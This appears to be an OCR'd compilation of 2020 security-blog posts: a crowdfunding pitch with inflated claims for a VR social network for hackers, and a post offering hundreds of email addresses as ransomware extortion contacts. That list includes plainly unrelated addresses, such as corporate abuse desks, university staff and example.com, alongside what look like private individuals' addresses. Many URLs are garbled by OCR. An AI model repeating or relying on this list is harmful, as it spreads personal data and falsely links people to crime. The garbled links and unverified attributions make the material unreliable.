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whitebeerdd@aol.com 
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auri@wwh.so 
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DarkMarket24.ru@yandex.ru 
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eugenysirotin@yandex.ru 
chup4.kabra@yandex.ru 
salvadOr@xmpp.jp 
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balooo@jabber.ru 
misha9106@mail.ru 
lerib@exploit.im 
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Xxsrae@mail.ru 
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instaboomoff@gmail.com 
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black sv@xmpp.jp 
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poster.avito@gmail.com 
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sellhl777@gmail.com 
nblec@xabber.org 
zayavki.lom999@gmail.com 
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leon2517@exploit.im 
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grizzlystaff@xmpp.jp 
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Will69@jabbka.ru 
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sngjob@jabb.im 
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rello@wwh.so 
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awento@mail.ru 
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vvavto1981@mail.ru 
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aleksey-shewchenko@mail.ru 
dimkag66@mail.ru 
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elinaverle@mail.ru 
chi-74@mail.ru 
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kosmonavt85@inbox.ru 
wetwar5452@bk.ru 
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mash123321@mail.ru 
fred160785@mail.ru 
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dusha__ _88@mail.ru 
laska944@mail.ru 
sdkjfasofdj@mail.ru 
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rada.tatyana@mail.ru 
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fedor 41@mail.ru 
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debil9535@mail.ru 
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sfad40@mail.ru 
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ylija5lreg@mail.ru 
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alina.yakovleva.89@mail.ru 
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early3.2010@mail.ru 
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omv.13@mail.ru 
zub02@mail.ru 
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hitaryauchi@rambler.ru 
albinal2121979@mail.ru 
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coca-cola94@bk.ru 
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mara _777s@mail.ru 
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weps44@mail.ru 

8206 


ilikecangoos@list.ru 
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u_854@mail.ru 

viki _78@bk.ru 
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Stay tuned! 
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16.7 September 


16.7.1 Cyber Security Project Investment Proposal - Cybertronics - VR for Hackers 
and Security Experts - Support me Today! (2020-09-01 19:19) 


[1] 


Cybertronics 


We started in 2019 thanks to our CEO Dancho Danchev who decided to launch a major prod- 
uct called Cybertronics - VR for Hackers and Security Experts including the establishing of a 
direct partnership with Astalavista.box.sk the original hackers search engine circa 1994 where 
he’s currently running a high-profile hacking and security project serving the needs of millions 
of loyal U.S based users including international users following a successful re-launch of the 
Astalavista.box.sk project. 


The primary Dark Web crowd-funding URL for this campaign is - 
http://Ikzihepprihxtvbutjedoazbsqd4avmifhpjms3zuq7itceiu4qajwad.onio n/ where’ you 
can find the actual technical specifications for this project including the actual Bitcoin donation 
address. 
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Drop me a line at dancho.danchev@hush.com in case you're interested in a possible 
seed investment for this project or offering any sort of operational and financial support 
including to actually use my PayPal ID: dancho.danchev@hush.com for the purpose of this 
project. 


Keywords: Hacker, Hacking, Security, Information Security, Computer Hacking, Network 
Security, Network Hacking, Virtual Reality, Virtual Reality Glassess, Virtual Reality Helmet, Bit- 
coin, Bitcoin Donation, Penetration Testing, Jabber, XMPP, Hacker Book, Hacking Book, Hacker 
Book Memoir, Hacking Book Memoir, End-to-End Encryption, SSL, DNSSEC, Cryptocurrency, 
Points Based Virtual Economy, Virtual Economy, Social Media, Social Media Network, Virtual 
Social Network, VR, VR Social Network, Oculus Rift, Leap Motion, Cryptohippie, CHAVPN, 
Closed-Communication Group, Ethernet Encryptor, O0enGPG, OpenPGP Smart Card, P2P Host- 
ing, Distributed Hosting, Covert Channel, Deep Packet Inspection, Eavesdropping, Surveillance 


Pitch 


Welcome to the Wonderful World and the Future of Hacking and Information Security! 
Enter and Join Today the World’s Largest and Most Popular VR-Based Hacker and Security 
Expert Social Network Platform Including the Initial Crowd-Funding Campaign For the Project! 


Executive Summary 


Led by CEO Dancho Danchev Cybertronics is proud to present the general availability of 
a proprietary and never released before custom version of the World’s Largest and Most 
Popular Virtual Reality Based Hacker and Security Expert Social Network Platform empowering 
millions of active users on a monthly basis with the necessary access to data information 
and knowledge to help them learn educate themselves share their knowledge and learn from 
others in the World of Computer Hacking and Information Security. 


Led and presented by Cybertronics - the projects aims to present to the general public a 
versatile and multi-platform Oculus Rift and Leap Motion compatible Virtual Reality application 
targeting millions of active users on their way to become hackers and learn from others in the 
World of Computer Hacking and Information Security. 


Official Press Release: 


"In 2020, we’re proudly presenting the World’s first and most popular and sophisticated 
Virtual Reality and Augmented Reality Network Platform or Hackers and Security Experts 
connecting millions of users globally through the launch of an ubiquitous VR-based Social 
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Media platform and the general availability of an ubiquitous XMPP-based VR-based Virtual 
Keyboard and a sophisticated skills and experience including location-based and aware Virtual 
Reality experience successfully connecting millions of users globally on a Virtual Reality based 
landscape empowering everyone with the necessary "know-how" and technical expertise to 
reach out to fellow colleagues VIP members from the Hacker Community including the Security 
Industry including the general availability of an ubiquitous cross-platform based Desktop and 
Mobile Device application issuing "real-time" notifications and updates possibly assisting in 
the actual improvement of the user’s work-flow in both the "real" and Virtual Reality World 
including actual project and business including personal and skills and experience based 
"match-making" and Hacker and Security Community outreach. 


The primary purpose of the VR application would be to connect empower and facilitate 
an ubiquitous "real" World and Virtual World type of sophisticated and novice Hacker and 
Security Expert experience ultimately connection international Hackers and Security Experts 
including the actual integration and development of never-seen and released-before API-based 
type of innovative services and products ultimately built on the top of the VR-based Social 
Media Platform. 


Key Examples include: 


- Built-in Ethical Penetration Testing API for research and testing purposes 


- Built-in APl-based Honeypot deployment further assisting the Security Industry through 
the ease of deployment 


- Never-seen before Cluster of Activity Targeting Intelligence Analysts and Members of 
the U.S Intelligence Community through the general availability of an offensive and de- 
fensive Cyber Warfare Platform functionality allowing the successful Training including the 
development of actual Wargames Scenario type of offensive and defensive Cyber Warfare 
Cluster-based activity." 


The Office: 


Cybertronics CEO Dancho Danchev has been running a cyber security and cybercrime 
fighting research lab since 2006 in his place and has successfully managed to position himself 
as one of the World’s leading experts in the field of cybercrime fighting. In his lab he produces 
and researches various cybercrime groups and persistently communicates and shares the 
"crown jewels" of his research with a vast network of U.S based researchers members of the 
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Sample VR and Virtual Keyboard Concepts: 
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Project Status: 


- Astalavista.box.sk is the official partner of the Cybertronics - VR for Hackers and Secu- 
rity Experts project the original search engine for hackers circa 1994 which is one of the 
World’s most high-traffic visited Web site for hackers and security experts 


- Several VR application developers have already expressed interest in working on the 
project and we have several other VR application developers waiting to join the team 


- The majority of marketing and advertising will be done using industry-leading partner- 
ships with leading hacker and security expert Web sites including actual community and 
security conference outreach including active social media advertising and outreach 


To-Do List 


Reach out to Custom Crypto-currency Developer to properly launch and introduce Se- 
cureCoin 
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Reach out to Tor Links Directory for a Possible Inclusion Including Banner Advertisement 
Finish Working on the Project Semantics In Terms of Features and Innovative Design 
Finish Working on the Project FAQ 

Finish Working on the VR-Platform Manual Guide 

Finish Working on the VR-Platform Tutorial Guide 

Reach out to CD/DVD Labeling and Shipping Service Provider 

Record Two-Hour Long Introduction to the Project and the Platform 

Develop multi-platform multi VR-headset functionality and compatibility features 


Develop a proper VR Application Platform Manual And Tutorial 


Financials 
$10,400 - Virtual Reality Application Development 


$25,500 - Major Web Property Acquisition and Partnership to Acquire More Users and 
Spread the Word 


$10,000 - Logistics Infrastructure for Shipping the CD/DVD Containing the Application 
$3,000 - Printed E-book FAQ and Virtual Reality Application Manual Production 
$20,000 - Infrastructure Management and Closed-Network Group Development 


$15,000 - Custom "Points Based" and Democracy including Liquid-Based Cryptocurrency 
Development 


$3,000 - Personal Printed Memoir Design and Development 


$26,600 - Advertising and Marketing Including VR Application Promotion and Traffic Ac- 
quisition 


$15,000 - Hacker and Security Community Outreach in terms of API Implementation in- 
cluding a Standardized and Custom Service and Solution Platform Integration Implementation 


$30,000 - Acquire an Industry Leading VIP Team of Hackers Innovators and Application 
Developers and Pay Maintenance Fees for the VR Application 


$30,000 - Research and Development in terms of the VR Application Including the Intro- 
duction of New Features and Acquisition of New Users 
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Key Features Summary 


A ubiquitous End-to-End Encrypted Jabber-based OTR (Off-The-Record) Encrypted Chat 
Feature connecting millions of users globally 


Clustered Skills and Experience-Based Opt-In Hacker and Security Expert Expert Method- 
ology in over 50 Categories Including Security Bloggers Hacktivists Anarchists Privacy 
Advocates Censorship Researchers and Human Rights Advocates including Blackhat and 
Gray Hat hackers including Security Industry Leaders and VIP Members 


Self-Sufficient Eternal Virtual Cyber Economy including a "Points-Based" Economy and 
Cybertronics Branded Custom Democracy And Voting-Based Cryptocurrency ensuring the 
spread preservation and dissemination of Computer Hacking and Information Security 
Knowledge to millions of loyal users globally 


Localization at its best including advanced geolocation on a per-country and on a per-city 
basis introducing local Hacker and Security Expert communities introducing local Hacker 
and Security Expert economies and social network driven communities 


Future Global Hacker and Security Expert Network including mainstream local and global 
community announcements and featured events and products including service 


End-to-end Encrypted Communications including Enhanced Personal Encryption and User 
Identification using PGP (Pretty Good Privacy) and Jabber OTR (Off-The-Record-Messaging) 
including Yubico-Based Two-Factor Authentication Extended Validation SSL and DNSSEC 
Support 


Closed-Communication Group Network Preserving Key Privacy and Security Features of 
Modern Hacker and Security Expert Social Network Platform 


P2P-Based Content Distribution and Hosting Including Censorship and Surveillance Re- 
silience 


Standardized Security Product and Security and Hacking Service Partner API Allowing Ven- 
dors and Commercial and Community-driven Hacking and Security Service Providers Easy 
Access to the Platform 


Covert Communication Channel P2P Based Social Media Platform Making Deep Packet 
Inspection Including Possible Communication Surveillance and Eavesdropping on Member 
Communication Virtually Impossible 


Client-to-Site Ethernet Encryptor Further Enhancing The Privacy and Security Features 
of the Platform Making it Impossible for Someone To Eavesdropp or Launch a Potential 
Surveillance Attack Campaign 


OpenPGP Smart Card Enabled Web-Based On-the-Fly SSL Session Authentication Ensuring 
Maximum Security and Advanced Identity-Based Secure User Authentication 
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Sample Technical Specifications: 


Introduction 

Executive Summary 

Project Semantics 

VR-Based Interface 

Hardware Specifications Soliciting 
Platform and Social Network Migration 
Import Facebook Contacts 

Import Gmail Contacts 

Import Steam Contacts 

Invite Your Friends 

Earn Points for Converted Friends 

Claim VIP Status 

High-Trafficked Web Site 

Major Security Project 

Major Hacking Project 

Old-School Hacking Project 

Old-School Security Project 

Old-School Hacking Software Developer 
Old-School Security Software Developer 
Access and Permission-Based Social Network Control System 
Geolocation Points 

VIP Status 


Content-Based “Points Economy 
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Voting-Based 

Comments-Based 
Application-Specification 

Profile Basic Introduction 
Requirements 

Valid Email 

Valid Phone Number 

Valid Second Phone Number 

Valid and User-Generated Profile 
Valid and User-Generated Web Site 
Category-Based Inclusion 
Tags-Based Inclusion 

Distributed Search Engine Indexing 
Voting-Based Access Permission Granting 
Profile Basics Categorization 

Real Name 

Handle 

Valid Email 

Valid PGP Key 

Skills-Based Opt-In 
Category-Based Opt-in 

Trial Access 

Featured VIP Participants 

Network Status Update 


Network Status Headline and Messages 
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Future Internet GUI Interface 

Purchase Subscription 

Partner Ecosystem API Registration 

Penetration Testing Services API 

Ethical Phishing Testing API 

Honeypot Installation Service API 

CanaryTokens API 

T-Pot API 

Honeydrive API 

Connectivity Requirements 

Cisco Malware Connector 

P2P-Based Data and Information Hosting and Dissemination 
Central Server 

Redundancy Planning and Contingency Planning 
Clear-Net Access 


CHAVPN Closed-Group Access 


Marketing Concept 


The platform ultimately targets users in the following Categories: 


Hackers 
Independent Security Researchers 
Penetration Testers 


Hacker Groups 
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Activists 

Free Speech Writers 
Privacy Advocates 
Censorship Researchers 
Exploit Writers 

Malicious Software Debuggers 
Hacktivists 

Political Activists 
Security Bloggers 
Cybercrime Researchers 
Malware Researchers 
OSINT Analysts 


Intelligence Analysts 


Sample Personal Photo of CEO and Founder of this Project - Dancho Danchev - The World’s 
Leading Expert in the Field of Cybercrime Research and Threat Intelligence Gathering: 
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set Effective Endpoint Protect. 


We won't 
slow you down. 
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Stay tuned! 
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18. https://1.bp. blogspot .com/-RSoiDFxSzLg/XxYJn3Gv5Z1/AAAAAAAALDW/2yRYHOIf£2UgF_whpg5alL49hNu_z54GPwCLcBGAs 


Q/s1600/Dancho_Danchev_Blog_Security_Blog Statistics.p 
19. https://1.bp.blogspot.com/-6pbnIsSNm_4/XxYJvP2rbGI/AAAAAAAALDO/QTcngH79huImXMWef AQeuMUNBf-NZBF3ACLcBGAs 
Q/s1600/Dancho_Danchev_Blog Security_Blog Statistics_0 


20. https://1.bp.blogspot.com/-ZmAhuzZhYxE/XxYJ6JF chwI/AAAAAAAALEA/eBGW9vzoL1Qx05Waq7LvkLbrq9b0sL5UgCLcBGAs 


Q/s1600/Misc_330. png 


21. https://1.bp.blogspot.com/-PqvqRrC6u08/XxYJ_-CHqWI/AAAAAAAALEE/knZZqum9XQcqUI cwkTg9iCcSg98WUTIf£QCLcBGAs 


Q/s1600/Misc_222.png 

22. 
Q/s1600/90791575_277922659866254_2328071303216496640_n. 

23. 
Q/s1600/90933426_277923943199459_1457506553581010944 n. 

4. https://1.bp.blogspot.com/-wjxynhBhHrE/XxYIQt1Y6r1/AAAAAAAALB8/_1rfRioRfiOuuNnJ201kANCcA7m6PviQQCLcBGAs 
Q/s1600/90955373_277922003199653_6055863402998267904_n. 

25. 
Q/s1600/91155427_277921526533034_2778966504777973760_n. 


26. https://1.bp. blogspot .com/-UPZUEnMM_q8/XxYIR71cYTI/AAAAAAAALCE/kM4WmNHA5eIHkCpCMsDTQ9CoRF1_fhkmgCLcBGAs 
Q/s1600/98596242_312951359696717_4617734483431391232_o. 


27. https://1.bp.blogspot.com/-UTHjuxT-BFO/XxYIR_rbwXI/AAAAAAAALCI/Ip08qrbx6BoncepShNhYV388gxp181bkACLcBGAs 

Q/s1600/98603388_312951903029996_8901408158631591936_n. 

28. 

Q/s1600/98604839_312953883029798_1988928195759439872_n. 
ttps://1.bp.blogspot.com/-vFd5pH1ADCY/XxY108- 9VfI/AAAAAAAALBg/AyL7CMf geOgMGVstH4pxkmL5WxB7XFbkQCLcBGAs 

Q/s1600/106931599_341606336831219_2691374953830546818_ 

0. 

Q/s1600/107338603_341607386831114_1935662495637999127_o 

Q/s1600/107841182_347322749592911_2401491087674201588_ 

2. https: //1.bp. blogspot . com/-3Hrve6xn4cQ)/XxYIPzgnabl/AAAAAAAALBw/fXZdJhbigh4ek0dp J5woaowyZBJUe 1WUwCLcBGAsY 


Q/s1600/109304590_347323962926123_2905325204636440093_o 
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16.7.2 Are you on Twitter? (2020-09-04 16:51) 


[2] 
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Meanwhile - you can also grab an offline copy of [3]my old Twitter account circa 2010-2014 
where I’m proud to have participated in a Top Secret GCHQ Program called "[4]Lovely Horse" 
which monitors hackers and security experts for technical and technological "know-how". 


Enjoy! 


1. baper//eaiteer,coa/denche_danched 

2, itape://eviteer,con/dencho-danchey 

3, hetps://adanchev. blogspot .con/2010/12/dencho-danchevs- wit ter-account-2010. heal 
4. https: //cryptome . org/2015/02/gchq- lovely-horse-intercept- 15-0204. pdf 


16.7.3 Profiling a Currently Active High-Profile Cybercriminals Portfolio of 
Ransomware-Themed Extortion Email Addresses (2020-09-11 17:56) 


Your Pc is hacked! 
Files are encrypted, if you decrypt the files 


contact us! 


Email address : decrytorsoon301 @aol.com. 


UPDATE: I've just updated the original post and added an additional set of ransomware-themed 
extortion email addresses. 
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Dear blog readers, 


| wanted to take the time and effort and present the findings of my most recent Technical 
Collection efforts in the broader context of reaching out to the U.S Intelligence Community 
and U.S Law Enforcement on its way to provide actionable threat intelligence on currently 


active and prolific ransomware threat actors that are actively collecting money by using 


compromised hosts and largely relying on publicly accessible email service providers for the 


purpose of soliciting the actual amount. 


You can grab a full copy of the portfolio from [1]here. 


Sample actual public email addresses used for the actual ransomware extortion process: 


Oxdarkgw@hacker.im 


0002543343@mcimail.com 
007blackhack@gmail.com 
O06egor99@mail.ru 
1.20.18@exploit.im 

10 _10@mail.ru 
98georgelivanos@gmail.com 
123x01@jabber.at 
1047@blah.im 

1047 @crypt.mn 
1047@exploit.im 
1337xto@mail.ru 
1896.697170952@dbc.mtview.ca.us 
5656-94@mail.ru 
5662@bk.ru 
8888@qwerty.ru 
9980dinesh@gmail.com 
10000mama@mail.ru 
10000pasha@mail.ru 
38721@email.ua 
42436DF8015B1C7C@n001.scl.cp.net 
112233@exploit.im 
112244@xmpp.jp 
335844@mail.ru 


421606C90002B81E@occmta05a.terra.com.mx 
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551513@zloy.im 

563083@mail.ru 

566489@mail.ru 

5663931@mail.ru 

5671900@mail.ru 

56732100@mail.ru 

56732188@mail.ru 

56788765@mail.ru 

549697621@qq.com 

554301449@qq.com 

567432654@mail.ru 

681760488@678.com 

1229075552@qq.com 
200504161226.j3GCQvmC008777@utrillo.masterweb.it 
200507161954.j6GJsq3J014555@dante.bdp.it 
200507212329.j6LNT3eS039951@www3.pochta.ru 
200507280406.j6S46Ati023381@viking.xssl.net 
200508021228.j72CSWQN012508@ns0.sbc-dns.com 
20050615033704.48CA6375A@ristorart. biz 
20050714065043.B102F53E9F@rekin18.go2.pl 
20050727225516.1A54B38113@rekin11.go2.pl 
20200722234538.166697-1-posk@posk.io 
-guliaevserg@yandex.ru 

_drug 000@mail.ru 

_drug 999@mail.ru 

a444guy@hotmail.com 

a-mex@xmpp.jp 

a.odonovan@live.com 

a _bouchmal@hotmail.com 
aacomercialbenavides@hotmail.com 
aacpac99@hotmail.com 

aaquach@ucsd.edu 

aardvarktine@gmail.com 
aaron12001234@hotmail.com 


aarone.smith@hotmail.com 
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aawalker76@hotmail.com 
abbi johnson@hotmail.com 
abc _354@hotmail.com 


abdulhakim.vahab@icloud.com 


abdulla.92.iq@gmail.com 
abedinthaqi7@gmail.com 
abhi007iit@gmail.com 
abhiman98@gmail.com 
abhishek.052@gmail.com 


abhishek.vijayvargia@gmail.com 


ability@hotmail.fr 
ablick18@pinterest.com 


abolzan@hotmail.com 


about2000milesfromhere@hotmail.com 


abrakadabra@hotmail.com 
absolut _xxxerO@yahoo.com 
abuse@bankofamerica.com 
abuse@demon.net 
abuse@hqcombo.com 
abuse@novatel.bg 
acid27@hotmail.com 
acoube@hotmail.com 
activation@dlab.im 
adammikael@msn.com 
adartnalllr@homestead.com 
addie alone _1@hotmail.com 
adhar.doank@gmail.com 
adhavan.d@gmail.com 
adheplan@gmail.com 
adhitadeva@gmail.com 
adi.aditya6@gmail.com 
adiandjakevids@gmail.com 
adingate15@furl.net 
adjOOO08@auburn.edu 


admin@cnhonkerarmy.com 
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admin@dc4.us 
admin@insorg.org 
admin@kololk.com 
admin@krsan.com 
admin@leetupload.com 
admin@luganskservers.net 
admin@mail.ru 
admin@marlk-hacks.ru 
admin@multi-vpn.biz 
admin@mygaminglounge.com 
admin@mywebsite.com 
admin@shopsocks5.com 
admin@su29.ru 
admin@thesecure. biz 
Admin@Ugodlike.pw 
admin@xaxaxa.ru 
admin@youweb.com 
admin@zyberph.com 
admins@admin.com 
admins@mail.ru 
admlt784@dsl.ukrtel.net 
adombrow@emich.edu 
adomerque2b@twitpic.com 
adominetti4z@mozilla.com 
adrian.sotol16@hotmail.com 
adrian@hotmail.com 
adrianb7928@yahoo.com 
adriano-2012@hotmail.com 
ads.soikeoio@gmail.com 
adurnay@hotmail.com 
adv.support1@hack-jabb.ru 
adv.supportl1@xmpp.name 
adv.support2@hack-jabb.ru 
adv.support2@xmpp.name 
aelphaeis mangarae88@yahoo.com 
8304 


aevennett3x@slate.com 
afiskon@jabber.ru 
ag _lyman@hotmail.com 
agaval59@yandex.ru 
agron 6@hotmail.com 
agus pnaense@hotmail.com 
ahimberg@hotmail.com 
ahmed-alkuwaiti@hotmail.com 
ahmetovsultan@mail.ru 
ahren81174@hotmail.com 
ahugeopportunity@hotmail.com 
aihds@hotmail.com 
ajiang@umd.edu 
ajorat4f@jigsy.com 
akhildand2@gmail.com 
akhilsO24@gmail.com 
akhilvettamukku@gmail.com 
akhmadf@gmail.com 
akhmadhs@gmail.com 
akwwatson@hotmail.com 
alancitol141@hotmail.com 
alasdairlocke@hotmail.com 
alawrance1ll1@un.org 
albaniankalilinux@gmail.com 
albatros@live.in 
albertonasr26@hotmail.com 
albertwatson@live.com 
alderson@exploit.im 
alejosrocio@yahoo.es 
alekken@live.no 
aleksander vedvik@hotmail.com 
alessandrogaudio@hotmail.com 
alestance@gmail.com 
alevering@hotmail.com 
alevoska@gmail.com 
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alex52rus@e-mail.ru 
alex52rus@mail.ru 
alex77sand@rambler.ru 
alex-eastwood@hotmail.co.uk 
alex.agmv@gmail.com 
alex.batchelor@gmail.com 
alex.bedeleu@gmail.com 
alex.oldland@hotmail.co.uk 
alex@example.com 
alex@noweb.org 

alexa _vlad@exploit.im 
alexander-hansen@live.no 
alexander@hotmail.com 
alexandra2304@yahoo.com 
alexandria231@exploit.im 
AlexeyHacks@gmail.com 
alexf15q@mail.ru 
alexgauthier@live.ca 
alexmichitsch@hotmail.com 
alexneth@hotmail.co.uk 
alexpettersen@msn.com 
alexzite@pochta.ru 
alfalfa@hotmail.com 
alhimiq@exploit.im 
ali_manasra@hotmail.com 
ali nishat@hotmail.com 
alicia@hotmail.com 
alimi.david@gmail.com 
alin.ponici@gmail.com 
alin.streinu@gmail.com 
alinatsol@gmail.com 
aliosmangulcemal@gmail.com 
alip-prog@yandex.ru 
aliraza5839@gmail.com 
alk1605@hotmail.com 
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alkj1@hotmail.com 
allawi _111@hotmail.com 
alpha _reiki lady@hotmail.com 
aluxford2k@sakura.ne.jp 
alyahril980@hotmail.com 
amandaleijon@hotmail.com 
amarildofrroku1995@gmail.com 
amarillonaranja@gmail.com 
amarjit345@gmail.com 
amark0347@gmail.com 
amarshall@amarshall.com 
amatomaxime@gmail.com 
amauris.burgos@gmail.com 
amauryhelleu@gmail.com 
ambientedexsy@hotmail.com 
amcelholm@hotmail.com 
amente@live.com 
amerz73@hotmail.com 
ametherell45@squidoo.com 
ami22@mail.ru 
amigo trade@xmpp.jp 
amirnadarevic@hotmail.com 
amitjadeja@hotmail.com 
amohamed143@hotmail.com 
amorris@msn.com 
anagramofcool@gmail.com 
analiacardozo 22@hotmail.com 
anandacardoso@live.com 
anden _liverpool@hotmail.com 
andernoo@live.co.uk 
anders.cc@jabber.root.cz 
andravcab@gmail.com 
andre.ace87@gmail.com 
andre.carius@gmail.com 
andre.fowler78@gmail.com 
8307 


andre.nilsenl2@gmail.com 
andre@hotmail.com 

andre 620@hotmail.com 
andre _ferreira_9@hotmail.com 
andreas __94@msn.com 
andrepaopao@hotmail.com 
andressavicentin@hotmail.com 
andrevla@sj.ms 
andrewchepp@hotmail.com 
andrewhaukedal@hotmail.com 
andrewspooner@hotmail.com 
andrey psd@xmpp.jp 
androidboter@swissjabber.ch 
androidskim@exploit.im 
andrt@nm.ru 

andy _mans@hotmail.com 
andy thebettertwin@hotmail.com 
andywar@mail.ru 
aneekalam@hotmail.com 
angel.sk8@hotmail.com 

angel 45 11@hotmail.com 
angelgreenl@hotmail.com 
angelica _marklund@hotmail.com 
angelina _kalay@hotmail.com 
angeltypez@hotmail.com 
angryflamehack@yandex.ru 
angryziber@angryziber.com 
anhduc200792@gmail.com 
anhduongbk52@gmail.com 
anhhuy621@gmail.com 
animagus 33@msn.com 
anitonline@mydomain.com 
anjana _janardhan@hotmail.com 
ankit@bol.net.in 


anna94@mail.ru 
8308 


anna.anna@inbox.ru 
anna.krox@loop.com 
annamak78@mail.ru 
annet93@live.nl 
anonim.kiber.com@gmail.com 
anonimusccn@gmail.com 
anony.killers@protonmail.com 
anonymous@hotmail.com 
anonymous@praise.com.pk 
ansib@hotmail.co.uk 
anthony.n.1989@gmail.com 
anthonyhinchliff@live.com.au 
antiemoclub@yahoo.com 
antikuci@yahoo.de 
antionline@mydomain.com 
antiroach@TDDIRC-B302EF68.uilenstede.casema.nl 
antonio j diogo@hotmail.com 
antoniosalamandre@xmpp.jp 
antonpanin@live.com 
anuragrao9211@gmail.com 
anvitjain@gmail.com 
anvor1000@gmail.com 
anyuta 50@mail.ru 
aolblowzme@hotmail.com 
apache@ns0.sbc-dns.com 
apache@utrillo.masterweb.it 
apache@viking.xssl.net 
apersicke2x@wix.com 
apkguard@exploit.im 
application@1tap.cc 
apyschoticelffilm@gmail.com 
arabhi@msn.com 
arasxxx@takas.It 
araund53@lycos.com 


arbabc@hotmail.com 


8309 


arbuz60@yandex.ru 
archdukechocula@hotmail.com 
ardman@xabber.de 
arensky.hack@gmail.com 
aristotlekhan@hotmail.co.uk 
arkider@gmail.com 
arkon38@gmail.com 
arlexperalta@gmail.com 
armend.durmishi2@gmail.com 
armywilliam@blueyonder.co.uk 
aronzonijr@msn.com 
arslanmuftuoglu@gmail.com 
art _p25@km.ru 
artamoshina94@bk.ru 
arthur-1005@hotmail.com 
artict@probiv.me 
artu5ras@zebra. lt 
arvin288@hotmail.com 
asakins4n@creativecommons.org 
asboss@ural-net.ru 
asdf1234@calendar.google.com 
asdf@asdf.com 
ashatun@mail.ru 
ashjharan@hotmail.com 
ashley.yousling@gmail.com 
ashleybickerstaff@hotmail.com 
ashloho@gmail.com 

asim _zeeshan@hotmail.com 
askvisa@visa.com 
asmith@hotmail.com 
asphire23@hotmail.com 
aspiriuS193@gmail.com 
aspwired@live.com 
asshyip@jabber.ru 
astaho@gni.dn.ua 
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astavset@hotmail.com 
astrognell3v@google.fr 
ataberkayata@yahoo.com 
atani@exploit.im 
atl9sign@hotmail.com 
atrevain5a@over-blog.com 
atreyumabob@hotmail.co.uk 
audioexec@hotmail.com 
august _steiro@hotmail.com 
aullican@126.com 
austin-cox@utulsa.edu 
austinmalone8@gmail.com 
austinmcknn@gmail.com 
austinzombinator@gmail.com 
australiabussines@gmail.com 
Authorar@yahoo.com 
authorblues@gmail.com 
auto-keey@yandex.ru 
autorobotrus@xmpp.pro 


avbox@jabber.ru 


avrahamblanck@protonmail.com 


avshaletip@gmail.com 
avshaletip@xmpp.jp 
awais-nawaz@hotmail.com 
awsouth@hotmail.com 
axiuno@gmail.com 
axle2000@msn.com 

axp terrax@hotmail.com 
ayonna87@mail.com 
ayush99@hotmail.com 
ayush@hotmail.com 
azamayoubi@hotmail.com 
azizmari@jabber.ru 
b1Izkw73@hotmail.com 
b3ckl3r@jabber.de 
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b3730777@nwldx.com 
b.seiffert@gmx.de 
ba.sandeep@gmail.com 
baardwijk900@gmail.com 
babajafar@gmail.com 
babak.fakhamzadeh@gmail.com 
babaka68@mail.ru 
babaka68@rambler.ru 
babanxhama@gmail.com 
babarocus1@live.com 

babi haiara@hotmail.com 
babrams3d@kickstarter.com 
babypasta@live.com 

bach _angelcarrillo@hotmail.com 
backpackerthijmen@hotmail.com 
backpkn@msn.com 
badkarmal264@gmail.com 
badoundiay@hotmail.com 
baileewootton@live.com 
bajaprinting@msn.com 
bambam@hotmail.com 
banality@creep.im 
banana@wwh.so 

banta _chris@hotmail.com 
barakirs@netvision.net.il 
barbmccune@hotmail.com 
bargok@hotmail.com 
barnhardt2@hotmail.com 
barristerbill@hotmail.com 
barristerjones3@tlen.pl 
barristerjones@tlen.pl 
barristerrgreenfield@msn.com 
barry@hotmail.com 
barryosborn@hotmail.com 
bartman@exploit.im 
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basha9759@gmail.com 
basha.athar@gmail.com 
basherxxxx@gmail.com 
bashman.95@gmail.com 
basilcernst@gmail.com 
basilhaig@gmail.com 
baskager@hotmail.com 
baudy@baud.com 
baza.2016@qip.ru 
bbahllp@tamu.edu 
bbayliss4c@craigslist.org 
bbreen@billbreen.net 
bburan@alum.mit.edu 
bcollisssSh@bluehost.com 
bcrane9@hotmail.com 
bdawid2j@devhub.com 
beauhill@live.com.au 
Beckjacobs@gmail.com 
beclovesenders@hotmail.com 
bej0101@hotmail.com 
bekkelien@hotmail.com 
bellacasanovaal7@gmail.com 
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zerounix32@gmail.com 


zerounix48@gmail.com 
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relock001@yahoo.com 


admin@besama.ga 
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id.ransomed@india.com 


Stay tuned! 
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16.7.4 Dancho Danchev’s Blog - Official Multiple E-Book Formats Full Offline Down- 
load Copy Available - Grab a Copy Today! (2020-09-11 17:58) 


Dancho Danchev 


An In-Depth Picture 
Inside Security 
Researcher's Dancho 
Danchev Understanding 
of Security Hacking and 
ybdercrime Incidents 


Dear blog readers, 


As it’s been a while since I’ve last posted a quality update | wanted to let everyone know that 
I’ve recently made a full [l]offline copy of my personal blog publicly accessible online for free 
which is currently available in multiple E-book formats with the idea to reach out to an even 
wider audience potentially communicating a decent portion of my situational awareness circa 
2008-2020 with E-book reader users who might be interested in learning more on some of the 
key and most important and prolific cyber attack and cybercrime gang incidents throughout 
the past decade and actually gain access to the actual technical details behind these 
campaigns with an in-depth discussion on some of the key TTPs (Tactics Techniques and 
Procedures) that shaped the security industry throughout the past decade including an 
in-depth discussion on various Web 2.0 trends and technological developments that shaped 
the industry circa 2005-2008. 
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Grab a full copy of the E-book compilation archive from [2]here (6.1GB) or consider browsing 
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ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_10_removed/,20-%20Unknown . 
ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_11_removed/,20-7%20Unknown. 


. https://unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_10_removed{%20-%20Unknown. 


ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_ 09_removed/20-%20Unknown . 
ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog 09_removed/,20-%20Unknown . 

. bttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_03_removed{20-%20Unknown. 

. https://unit-123.org/wp-content /uploads/2020/08/Dancho_Danchev_Blog_03_removed/,20-%20Unknown. 

. https://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_03_removed7/,20-%20Unknown. 1i 


. https://unit-123.org/wp-content /uploads/2020/08/Dancho_Danchev_Blog_03_removed.epub 


. https://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_07_removed{20-%20Unknown. 


. https://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_07_removed/,20-%20Unknown. 


. https://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_07_removed/20-%20Unknown. 1i 


. https://unit-123.org/wp-content /uploads/2020/08/Dancho_Danchev_Blog_07_removed.epub 


